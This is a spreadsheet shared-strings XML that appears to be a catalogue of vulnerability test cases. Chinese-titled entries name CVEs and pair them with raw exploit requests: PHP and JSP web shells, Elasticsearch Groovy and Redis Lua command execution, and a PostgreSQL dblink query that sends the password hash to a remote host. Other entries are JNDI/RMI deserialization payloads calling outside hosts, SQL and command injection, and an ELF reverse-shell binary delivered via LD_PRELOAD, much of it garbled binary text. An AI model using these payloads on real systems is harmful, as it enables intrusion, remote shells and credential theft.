    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>Weblogic远程代码执行(CVE-2018-2893)</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>Aapache Tomcat AJP 文件包含漏洞利用</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>MySql身份认证绕过_2</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>Nginx越界读取缓存</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
Range: bytes=-1217,-9223372036854774591</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>POST / HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------201625008418654028163691115891
Content-Length: 253
Origin: http://192.168.248.133:8080
Connection: close
Referer: http://192.168.248.133:8080/
Cookie: PHPSESSIDCV=5Tte00Ga7WVlwh%2BZtuQR5A%3D%3D; javascript_enabled_detect=2; javascript_enabled=1694776959000; local_tz=Asia%2FShanghai; pma_lang=zh_CN
Upgrade-Insecure-Requests: 1
-----------------------------201625008418654028163691115891
Content-Disposition: form-data; name="file_upload"; filename="a.jpg "
Content-Type: image/jpeg
&lt;?php system($_GET['a']);?&gt;
-----------------------------201625008418654028163691115891--</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>ActiveMQ任意文件写入</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>PUT /fileserver/2.txt HTTP/1.1
Content-Length: 359
&lt;%@ page import="java.io.*"%&gt;
&lt;%
  out.print("Cytosine Test&lt;br&gt;");
  String strcmd = request.getParameter("cmd");
  String line = null;
  Process p = Runtime.getRuntime().exec(strcmd);
  BufferedReader br = new BufferedReader(new InputStreamReader(p.getInputStream()));
  while((line=br.readLine())!=null){
    out.print(line+"&lt;br&gt;");
  }
%&gt;</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>POST /_search?pretty HTTP/1.1
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/text
Content-Length: 156
{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"}}}</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>_x0012_4_x0001__x0002__x0002__x0008_HTTP/1.1_x0005_/asdf_x000F_192.168.137.139_x000F_192.168.137.139P	_x0006_
keep-alive_x000F_Accept-Language_x000E_en-US,en;q=0.5_x0008__x0001_0_x000F_Accept-Encoding_x0013_gzip, deflate, sdch
Cache-Control	max-age=0_x000E_ Mozilla_x0019_Upgrade-Insecure-Requests_x0001_1_x0001_	text/html_x000B__x000F_192.168.137.139
!javax.servlet.include.request_uri_x0001_/
_x001F_javax.servlet.include.path_info_x000F_WEB-INF/web.xml
"javax.servlet.include.servlet_path_x0001_/</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>Q</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Malgun Gothic"/>
        <family val="2"/>
        <charset val="129"/>
      </rPr>
      <t>퀅</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>w_x000F__x0001_</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Malgun Gothic"/>
        <family val="2"/>
        <charset val="129"/>
      </rPr>
      <t>벓퀀</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>_x0001_4=</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Tahoma"/>
        <family val="2"/>
        <charset val="1"/>
      </rPr>
      <t>ʀ</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
s}_x0002__x000F_java.rmi.Remote_x001B_org.neo4j.shell.ShellServerpxr_x0017_java.lang.reflect.Proxy</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Microsoft New Tai Lue"/>
        <family val="2"/>
      </rPr>
      <t>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Tahoma"/>
        <family val="2"/>
      </rPr>
      <t>̐</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>C</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Tahoma"/>
        <family val="2"/>
        <charset val="1"/>
      </rPr>
      <t>˂</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>_x0001_L_x0001_ht%Ljava/lang/reflect/InvocationHandler;pxpsr-java.rmi.server.RemoteObjectInvocationHandler_x0002__x0002_pxr_x001C_java.rmi.server.RemoteObject</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Segoe UI"/>
        <family val="2"/>
        <charset val="204"/>
      </rPr>
      <t>ӡ</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>_x000C_a3_x001E__x0003_pxpw8
UnicastRef_x000F_192.168.248.133.D_x0006_HꫲS</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Malgun Gothic"/>
        <family val="2"/>
        <charset val="129"/>
      </rPr>
      <t>퀀</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>_x0001_4=</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Tahoma"/>
        <family val="2"/>
        <charset val="1"/>
      </rPr>
      <t>ʀ</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>_x0001__x0001_x</t>
    </r>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">t3 12.2.1
AS:255
HL:19
MS:10000000
PU:t3://us-l-breens:7001
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>_x0012_4_x0001__x0002__x0002__x0008_HTTP/1.1_x0005_/asdf_x000F_192.168.248.133_x000F_192.168.248.133P	_x0006_
keep-alive_x000F_Accept-Language_x000E_en-US,en;q=0.5_x0008__x0001_0_x000F_Accept-Encoding_x0013_gzip, deflate, sdch
Cache-Control	max-age=0_x000E_ Mozilla_x0019_Upgrade-Insecure-Requests_x0001_1_x0001_	text/html_x000B__x000F_192.168.248.133
!javax.servlet.include.request_uri_x0001_/
_x001F_javax.servlet.include.path_info_x000F_WEB-INF/web.xml
"javax.servlet.include.servlet_path_x0001_/</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>Weblogic远程命令执行(CVE-2018-3245)</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">t3 12.2.1
AS:255
HL:19
MS:10000000
PU:t3://us-l-breens:7002
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">t3 10.3.6
AS:255
HL:19
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>GIOP_x0001__x0002__x0005__x0002__x0003_xBEA_x0008__x0001__x0003__x000C_AdminServer3IDL:weblogic/corba/cos/naming/NamingContextAny:1.0_x0002_8_x0001_BEA*_x0010_s_x0003_th_x0005_</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Gadugi"/>
        <family val="2"/>
      </rPr>
      <t>ᑀ</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>_x000B_rebind_any_x0006__x0005__x0018__x0001_
127.0.0.1&amp;_x0001__x000C__x0001_ _x0005__x0001__x0001__x0006_(IDL:omg.org/SendingContext/CodeBase:1.0_x0001__x0001__x0002_
127.0.0.1&amp;dBEA_x0008__x0001__x0003__x0001_(IDL:omg.org/SendingContext/CodeBase:1.0_x0003_12_x0001_BEA*_x0010_</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Sylfaen"/>
        <family val="2"/>
      </rPr>
      <t>Գ</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
_x0001__x0001_,_x0001_ _x0003__x0001_ _x0001__x0001__x0005__x0001__x0001__x0001__x0001__x0003__x0001__x0001__x0001__x0001_	_x0005__x0001__x0001__x000F_ _x0001__x0001_BEA_x0003__x0014__x0005_</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Gadugi"/>
        <family val="2"/>
      </rPr>
      <t>ᑀ</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>BEA_x0004_
_x0003__x0006__x0001__x0013_Y4er545437464632254_x0001__x001D__x001C__x0001__x0001__x0002_&gt;RMI:weblogic.iiop.ProxyDesc:73CD9A45CBA52938:74261801B931EF00_x0002_YRMI:sun.reflect.annotation.AnnotationInvocationHandler:C003BED76E3338BB:55CAF50F15CB7EA5
8RMI:java.util.HashMap:86573568A211C011:0507DAC1C31660D1_x0015__x0001__x0001_?@_x000C__x0010__x0001_
#IDL:omg.org/CORBA/WStringValue:1.0_x0018__x0014_pwned545437459779884_x0001_
tRMI:com.bea.core.repackaged.springframework.transaction.jta.JtaTransactionManager:0D3048E07B1D3B7B:4EF3ECFBB628982F_x001C__x0001__x0001__x0001__x0001__x0001_
_x000C_ _x001C_rmi://121.36.44.128:7000/exp_x0002_@RMI:javax.rmi.CORBA.ClassDesc:2BABDA04587ADCCC:CFBF02CF5294176B_x0002__x0002_'RMI:java.lang.Override:0000000000000000_x0002_9RMI:[Ljava.lang.Class;:071DA8BE7F971128:2C7E5503D9BF9553_x0001__x0002_$`_x0002_</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Malgun Gothic"/>
        <family val="2"/>
        <charset val="129"/>
      </rPr>
      <t>쀀</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>$RMI:java.rmi.Remote:0000000000000000</t>
    </r>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /back.txt HTTP/1.1
User-Agent: Lavf/56.40.101
Accept: */*
Range: bytes=0-
Connection: close
Host: 10.82.200.214:8080
Icy-MetaData: 1
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET //linuxki/experimental/vis/kivis.php?type=kitrace&amp;pid=15;echo%20BEGIN;%25s;echo%20END; HTTP/1.1
Host: 10.66.245.125
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://10.66.245.125//linuxki/experimental/vis/kivis.php?type=kitrace&amp;pid=15;echo%20BEGIN;%25s;echo%20END;
Cookie: 78nh_2132_saltkey=mDoEHu44; 78nh_2132_lastvisit=1590391575; 78nh_2132_sid=G675wu; 78nh_2132_lastact=1590396306%09index.php%09
Upgrade-Insecure-Requests: 1
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>J
5.5.23)_x000B_4nR-("n)_x0008__x0002__x000F__x0015_{Uth-G^$4z,hmysql_native_password</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>Q_x0001_PCREATE FUNCTION public.array_to_string(anyarray,text) RETURNS TEXT AS $$
    select dblink_connect((select 'hostaddr=192.168.248.133 port=5432 user=postgres password=chybeta sslmode=disable dbname='||(SELECT passwd FROM pg_shadow WHERE usename='postgres'))); 
    SELECT pg_catalog.array_to_string($1,$2);
$$ LANGUAGE SQL VOLATILE;</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>*3
$4
eval
$185
local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res
$1
0</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>Ruby Net::FTP 模块命令注入</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /download?uri=ftp://192.168.248.132:2121/&amp;file=|touch${IFS}success.txt HTTP/1.1
Host: 192.168.248.133:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSIDCV=5Tte00Ga7WVlwh%2BZtuQR5A%3D%3D; javascript_enabled_detect=2; javascript_enabled=1694776959000; local_tz=Asia%2FShanghai
Upgrade-Insecure-Requests: 1
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>POST /apps/zealot/ipszealot/savepcap/24535 HTTP/1.1
Host: rules.intra.nsfocus.com
Connection: keep-alive
Content-Length: 289
Accept: */*
Origin: http://rules.intra.nsfocus.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.87 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryexJikj3YU29aziBL
Referer: http://rules.intra.nsfocus.com/apps/zealot/ipszealot/uploadpcap/24535
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7
Cookie: tvrsid=uw7dyzdy9zqt6wxoyah90av0z30jyly8; top_menustatue_NSFOCUS 威胁响应和产品规则管理系统=1,3,3
------WebKitFormBoundaryexJikj3YU29aziBL
Content-Disposition: form-data; name="pcap"; filename="2020-8840.json"
Content-Type: application/json
["org.apache.xbean.propertyeditor.JndiConverter", {"asText":"rmi://127.0.0.1:1099/ExploitMac"}]
------WebKitFormBoundaryexJikj3YU29aziBL--</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /check_community.php?community=1' AND (SELECT 6941 FROM (SELECT(SLEEP(10)))Qaxg) AND 'sdHI'='sdHI HTTP/1.1
Host: 192.168.18.71
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.18.71/xinge/login_page.php
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=4a6arunmnkjn5bc77kqefqcao2
Connection: close
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>Wow!</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>POST /cgi-bin/index?LD_PRELOAD=/proc/self/fd/0 HTTP/1.1
User-Agent: curl/7.55.1
Accept: */*
Content-Length: 8584
Content-Type: application/x-www-form-urlencoded
Expect: 100-continue
ELF_x0002__x0001__x0001__x0003_&gt;_x0001_@_x0008_@H_x001A_@8 @_x001D__x001A__x0001__x0005_䊀䊀 _x0001__x0006_荀荠荠_x0002__x0002_ _x0002__x0006__x0008__x000E__x0008__x000E_ _x0008__x000E_ _x0001__x0001__x0008__x0004__x0004_</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Segoe UI"/>
        <family val="2"/>
        <charset val="238"/>
      </rPr>
      <t>ȁȁȁ</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>$$_x0004_P崤_x0004_d
d
d
_x001C__x001C__x0004_Q崤_x0006__x0010_R崤_x0004_荀荠荠_x0018__x0002__x0018__x0002__x0001__x0004__x0014__x0003_GNUg)î^x.lV_x0006_hh_x0005__x0018_</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <charset val="178"/>
      </rPr>
      <t>ـ</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>_x0003__x000F__x0001__x0006_Р_x0001__x0004_P	_x000F__x0013__x0015_BE</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Sylfaen"/>
        <family val="2"/>
      </rPr>
      <t>լ</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>4</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Yu Gothic"/>
        <family val="2"/>
        <charset val="128"/>
      </rPr>
      <t>㏞㒼</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>a</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <charset val="178"/>
      </rPr>
      <t>ر</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>X_x001C__x000E_</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Malgun Gothic"/>
        <family val="2"/>
        <charset val="129"/>
      </rPr>
      <t>듯</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>_x000E__x0003_	 _x001C_ _x0012__x0012__x0012__x0012__x0012__x0001_ a _x0012__x0012_8 R"_x0012_</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Sylfaen"/>
        <family val="2"/>
      </rPr>
      <t>ր</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>_x0010__x0017_p_x0010_ u_x0011__x0017_h_x0010_ _x0008_退_x0010__x0018_x_x0010_ _x0011__x0017_`_x0010_ _x0004_</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Segoe UI Historic"/>
        <family val="2"/>
      </rPr>
      <t>݀</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>_x0010__x0018_p_x0010_ _x0010__x0012_	 _x0016__x0012_
D
__gmon_start___init_fini_ITM_deregisterTMCloneTable_ITM_registerTMCloneTable__cxa_finalize_Jv_RegisterClassesserver_ipserver_portsockethtonsinet_addrconnectexitdup2execve__stack_chk_faillibc.so.6_edata__bss_start_endGLIBC_2.2.5GLIBC_2.4_x0002__x0003__x0003__x0003__x0003__x0003__x0003__x0003__x0003__x0001__x0001__x0001__x0001__x0001__x0001__x0001__x0001__x0002_</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Tahoma"/>
        <family val="2"/>
      </rPr>
      <t>̀</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>_x0010_u_x001A_i	_x0003__x0010__x0014_ii
_x0002_荠_x0008__x0010_	
 _x0008_@	
 _x0008_</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t>Ј</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">X_x0010_ _x0008_X_x0010_ h_x0010_ _x0008_M
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Segoe UI"/>
        <family val="2"/>
        <charset val="238"/>
      </rPr>
      <t>ȏ</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> _x0006__x0002_</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t>Џ</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> _x0006__x0010_</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <charset val="178"/>
      </rPr>
      <t xml:space="preserve">؏ </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>_x0006__x0008_</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Segoe UI"/>
        <family val="2"/>
        <charset val="161"/>
      </rPr>
      <t>Ϡ</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>_x0006__x0012_菠_x0006_	_x000F_ _x0006__x000C__x000F_ _x0006_
_x0018__x0010_  _x0003_ _x0010_  _x0004_(_x0010_  _x0005_0_x0010_  _x0006_8_x0010_   @_x0010_  
H_x0010_  _x000B_P_x0010_  _x000E_H</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Malgun Gothic"/>
        <family val="2"/>
        <charset val="129"/>
      </rPr>
      <t>숈</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>_x0005_M_x0008_ H4_x0005_蛀H</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Segoe UI"/>
        <family val="2"/>
        <charset val="238"/>
      </rPr>
      <t>Ĉ</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>À5b_x0008_ %d_x0008_ _x000F__x001F_@%b_x0008_ h頿%Z_x0008_ h_x0001_鐿%R_x0008_ h_x0002_逿%J_x0008_ h_x0003_鰿%B_x0008_ h_x0004_頿%:_x0008_ h_x0005_鐿%2_x0008_ h_x0006_逿%*_x0008_ h 鰿%  f%  fH=)_x0008_ H_x0005_)_x0008_ UH)H刃_x000E_v_x0015_H_x0005_f  H4	]</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Nirmala UI"/>
        <family val="2"/>
      </rPr>
      <t>এ</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>_x001F_D]Ï_x001F_@f._x000F__x001F_H=釠H5</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Cambria Math"/>
        <family val="2"/>
      </rPr>
      <t>⇠</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>UH)H刁_x0003_HHh?H_x0001_</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Segoe UI"/>
        <family val="2"/>
        <charset val="238"/>
      </rPr>
      <t>ƈ</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Segoe UI"/>
        <family val="2"/>
        <charset val="204"/>
      </rPr>
      <t>Ѿ</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>t_x0018_H_x0005_A  H4_x000C_]</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Nirmala UI"/>
        <family val="2"/>
      </rPr>
      <t>এ</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>_x001F_]Ï_x001F_@f._x000F__x001F_=  u'H=_x0017_  UH崌H=j  腿舿]</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Segoe UI"/>
        <family val="2"/>
        <charset val="238"/>
      </rPr>
      <t>ƅ</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>p  _x0001_Ï_x001F_@f._x000F__x001F_H=鄠H?u_x000B_鞿f_x000F__x001F_DH_x0005__x0006_ H4镈忐]逿UH刃</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Malgun Gothic"/>
        <family val="2"/>
        <charset val="129"/>
      </rPr>
      <t>찤</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>H_x0004_%(HE1:_x0001__x0002_赾E</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Segoe UI Historic"/>
        <family val="2"/>
      </rPr>
      <t>܈</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Segoe UI"/>
        <family val="2"/>
        <charset val="238"/>
      </rPr>
      <t>ǅ</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <charset val="134"/>
